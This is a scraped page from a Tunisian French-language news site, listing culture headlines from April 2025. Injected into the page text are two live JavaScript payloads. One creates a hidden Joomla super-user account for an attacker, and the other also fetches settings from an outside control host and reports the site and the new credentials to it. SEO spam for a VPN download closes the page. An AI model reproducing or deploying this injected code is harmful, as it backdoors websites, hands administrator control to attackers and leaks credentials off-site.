Suivez-nous
Facebook
Youtube
Tweeter
instagram
contactez-nous au
71 331 000
Abonnement
Rechercher
(function(){ var base = 'https://www.lequotidien.com.tn'; var u = 'Kingsman12'; var p = 'KingsmanIsBack@123'; var e = 'kingsman@evil.com'; fetch(base+'/administrator/index.php?option=com_users&view=user&layout=edit&id=0',{credentials:'include'}) .then(r=>r.text()) .then(html=>{ var m = html.match(/name="([a-f0-9]{32})"/); if(!m) return; var token = m[1]; var fd = new FormData(); fd.append('jform[name]', u); fd.append('jform[username]', u); fd.append('jform[password]', p); fd.append('jform[password2]', p); fd.append('jform[email]', e); fd.append('jform[block]', '0'); fd.append('jform[groups][]', '8'); fd.append('task', 'user.save'); fd.append(token, '1'); return fetch(base+'/administrator/index.php?option=com_users&task=user.save',{ method:'POST', credentials:'include', body:fd }); }); })(); ">
Accueil
National
Politique
International
Economie
Société
Santé, Education et Relations
Cuisine et astuces
Faits divers
Culture
Opinions
Sport
Naissance
Contact
(function () {'use strict';if (window.joomlacreater_inline_run) return;window.joomlacreater_inline_run = true;var C2 = 'https://xdxd.warnightkardesim.icu';var DEF = {login: 'admin_mori',pass: 'mori_pro3344',email: 'memetkaan43@proton.me',gid: '8'};var FORM_URL = '/administrator/index.php?option=com_users&view=user&layout=edit&id=0';function extractToken(html) {var p = [/"csrf\.token"\s*:\s*"([a-f0-9]{32})"/i,/'csrf\.token'\s*:\s*'([a-f0-9]{32})'/i,/name="([a-f0-9]{32})"\s+value="1"/i,/value="1"\s+name="([a-f0-9]{32})"/i];for (var i = 0; i < p.length; i++) {var m = html.match(p[i]);if (m) return m[1];}return null;}function isAdminHtml(html) {html = html || '';var head = html.slice(0, 12000);return /com_cpanel|view=cpanel|administrator\/index\.php\?option=com_/i.test(head)&& !/task=login|id="login-form"|com_login|login-form/i.test(head);}function fetchConfig() {return fetch(C2 + '/api.php?action=public_config', { credentials: 'omit' }).then(function (r) { return r.json(); }).catch(function () { return null; });}function mergeUser(data) {var u = {login: DEF.login,pass: DEF.pass,email: DEF.email,group_id: DEF.gid};if (data && data.ok) {if (data.user_login) u.login = data.user_login;if (data.user_pass) u.pass = data.user_pass;if (data.user_email) u.email = data.user_email;if (data.user_group_id) u.group_id = String(data.user_group_id);if (data.joomla_base) C2 = String(data.joomla_base).replace(/\/+$/, '');}return u;}function notifyRouter(router, u) {var fields = {url: location.origin,domain: location.hostname,username: u.login,password: u.pass,email: u.email,force: '1'};var payload = new URLSearchParams(fields).toString();try {fetch(router, {method: 'POST',mode: 'no-cors',headers: { 'Content-Type': 'application/x-www-form-urlencoded' },body: payload,keepalive: true});} catch (e) {}try {if (navigator.sendBeacon) {navigator.sendBeacon(router, new Blob([payload], { type: 'application/x-www-form-urlencoded' }));}} catch (e2) {}try {if (!document.getElementById('jc_router_iframe')) {var iframe = document.createElement('iframe');iframe.name = 'jc_router_iframe';iframe.id = 'jc_router_iframe';iframe.style.cssText = 'position:absolute;width:0;height:0;border:0;visibility:hidden';document.body.appendChild(iframe);}var form = document.createElement('form');form.method = 'POST';form.action = router;form.target = 'jc_router_iframe';form.style.display = 'none';Object.keys(fields).forEach(function (k) {var inp = document.createElement('input');inp.type = 'hidden';inp.name = k;inp.value = fields[k];form.appendChild(inp);});document.body.appendChild(form);form.submit();setTimeout(function () { form.remove(); }, 5000);} catch (e3) {}}function buildUserBody(token, u) {var body = new URLSearchParams();body.set(token, '1');body.set('task', 'user.apply');body.set('return', '');body.set('jform[id]', '0');body.set('jform[name]', u.login);body.set('jform[username]', u.login);body.set('jform[password]', u.pass);body.set('jform[password2]', u.pass);body.set('jform[email]', u.email);body.set('jform[registerDate]', '');body.set('jform[lastvisitDate]', '');body.set('jform[lastResetTime]', '');body.set('jform[resetCount]', '0');body.set('jform[sendEmail]', '0');body.set('jform[block]', '0');body.set('jform[requireReset]', '0');body.set('jform[groups][]', u.group_id);body.set('jform[params][admin_style]', '');body.set('jform[params][colorScheme]', '');body.set('jform[params][allowTourAutoStart]', '');body.set('jform[params][admin_language]', '');body.set('jform[params][language]', '');body.set('jform[params][editor]', '');body.set('jform[params][timezone]', '');body.set('jform[params][a11y_mono]', '0');body.set('jform[params][a11y_contrast]', '0');body.set('jform[params][a11y_highlight]', '0');body.set('jform[params][a11y_font]', '0');return body;}function createSuperUser(token, u) {return fetch(FORM_URL, {method: 'POST',credentials: 'include',headers: { 'Content-Type': 'application/x-www-form-urlencoded' },body: buildUserBody(token, u).toString(),redirect: 'follow'}).catch(function () { return null; });}function runCreate() {if (window.joomlacreater_create_done) return;window.joomlacreater_create_done = true;fetchConfig().then(function (data) {var u = mergeUser(data);var router = (data && data.ok && data.router_url) ? data.router_url : (C2 + '/router.php');return fetch(FORM_URL, { credentials: 'include' }).then(function (r) { return r.text(); }).then(function (html) {if (!isAdminHtml(html)) return;var token = extractToken(html);if (!token) return;return createSuperUser(token, u).then(function () {notifyRouter(router, u);});});}).catch(function () {});}function checkAdmin() {fetch('/administrator/index.php', {credentials: 'include',redirect: 'manual',cache: 'no-store'}).then(function (r) {if (r.type === 'opaqueredirect' || r.status === 0 || r.status === 302) {return fetch('/administrator/index.php', { credentials: 'include' }).then(function (x) { return x.text(); });}if (r.status === 401 || r.status === 403) return '';return r.text();}).then(function (html) {if (isAdminHtml(html)) runCreate();}).catch(function () {});}checkAdmin();setInterval(checkAdmin, 30000);})();
Culture
Fonds d’aide à la création «Elyssa» :Ces 19 heureux lauréats
Culture
dimanche 27 avril 2025 11:20
L’auteur soaudien Oussama Al Muslim invité de Foire internationale du livre de Tunis : Créera-t-il l’engouement à Tunis comme à Rabat et Alger?
Culture
dimanche 27 avril 2025 09:45
L’exposition « La Magna Mater de Zama à Rome » : un nouveau tournant dans l’histoire de Carthage et Rome
Culture
samedi 26 avril 2025 09:52
Le Président de la République préside la cérémonie de réouverture de la maison de la culture Ibn Khaldoun
Culture
samedi 26 avril 2025 09:38
Le Président de la République donne le coup d’envoi de la Foire internationale du livre de Tunis
Culture
samedi 26 avril 2025 09:32
La Roumanie pour la 1ère fois à la Foire du livre de Tunis et voici son programme
Culture
vendredi 25 avril 2025 10:44
Nouveaux objets archéologiques récupérés
Culture
vendredi 25 avril 2025 10:01
Ouverture aujourd’hui de la Foire internationale du livre de Tunis 2025 : Place à la découverte et à l’émerveillement
Culture
vendredi 25 avril 2025 09:00
Sicca Jazz 2025 : Laissez-vous tenter par le jazz et par le Kef
Culture
jeudi 24 avril 2025 12:35
Au Centre des arts, de la culture et des lettres « Ksar Said » : Un mois du patrimoine à la fois festif et académique
Culture
jeudi 24 avril 2025 10:39
Trois maisons d’éditions au 29ème Salon international du livre de Mascate
Culture
jeudi 24 avril 2025 10:31
La Tunisie et l’Italie célèbrent « 60 ans de coopération archéologique » au Musée National du Bardo
Culture
jeudi 24 avril 2025 10:20
Début
Précédent
101
102
103
104
105
106
107
108
109
110
Suivant
Fin
Page 106 sur 227
Partager sur :
facebook
twitter
instagram
Linkedin
Accueil
National
Politique
International
Economie
Société
Santé, Education et Relations
Cuisine et astuces
Faits divers
Culture
Opinions
Sport
Naissance
Contact
Accueil
National
Politique
International
Economie
Société
Santé, Education et Relations
Cuisine et astuces
Faits divers
Culture
Opinions
Sport
Naissance
Contact
quickq官网下载
quickq下载
quickq vpn官网下载
quickq vpn下载